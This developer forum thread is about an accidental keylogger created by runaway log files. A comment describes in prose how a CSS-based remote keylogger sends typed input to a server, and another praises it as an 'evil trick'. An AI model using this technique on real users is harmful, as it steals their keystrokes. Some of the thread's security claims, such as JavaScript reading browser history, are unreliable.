44
lorentz
3y

So apparently due to an extremely talkative x input driver and an error in a certain app, I've been running an emergent keylogger on my computer for half a year. On every keypress event, the driver would call the app, the app would segfault, the driver would log the incident including the event to /var/log and then crash, and the app would restart the worker. I noticed this when I started wondering why /var/log is over 100GB in size.

Comments
  • 8
    We had an internal website that would log every access to the site. We also had a widget on the site that would get weather info using ajax once per second. I was wondering why the website was having issues. I found this stupid log file and it was 6GB or so on a small drive. It was interfering with the computer working correctly. I don't know how long it took to build up to that size, but someone else maintains it now...
  • 10
    Reminds me of a CSS keylogger:

    You set a hidden element’s background image to a url including the text of an input box (using attr()) so the url contains the user input. The server then gets a new request for every change in the text box. Optionally add an advertising ID for uniqueness, and you’re done. Remote keylogger!

    Being a GET, it’s obv snoopable, but if you’re doing this you don’t care about user privacy anyway.
  • 3
    @Root I'll add this to my collection of evil tricks composed to break and abuse websites in hard-to-detect ways when opportunity comes.
    It can also be attached to a hidden pseudo element for added confusion.
  • 1
    Cheers I'll drink to that
  • 0
    @Root as long the request is over https it doesn't matter if it's a GET request.
  • 2
    @ZeldaFan69-2 Cloudflare, browser history.

    Honestly, I don’t like the idea of relying solely on transport level security. Single point of failure, can’t trust users to not install spyware certificates, other entities trying to spy, etc.

    Also, cloudflare is specifically designed to circumvent TLS via certificates, meaning they can and do intercept all HTTPS requests and responses in cleartext. Anything sent/received between a user and a “cloudflare-protected” website should therefore be treated as leaked / non-private.

    Plus, GET requests are stored in browser history, which JavaScript can get access to, meaning it should be treated as public information. Though requests made via CSS and other browser internals aren’t, so you’re right here. The above points stand, though.
  • 1
    @AtuM Oh my. You are making some scary sense.
  • 0
    @Root about needing sleep? 🤔
  • 0
    @jkommeren What?
    I mean, I do need sleep, but. What?
  • 0
    @Root err you mentioned he made sense. He said he needed sleep? 😁

    Sorry, late for me too 😅
  • 0
    @jkommeren Aha! Missed that.
    Missed the entire second half of his post, apparently.
  • 0
    @Root Curious, I also missed the second half until a few days ago.
  • 0
    @homo-lorens 🤷🏻‍♀️
Add Comment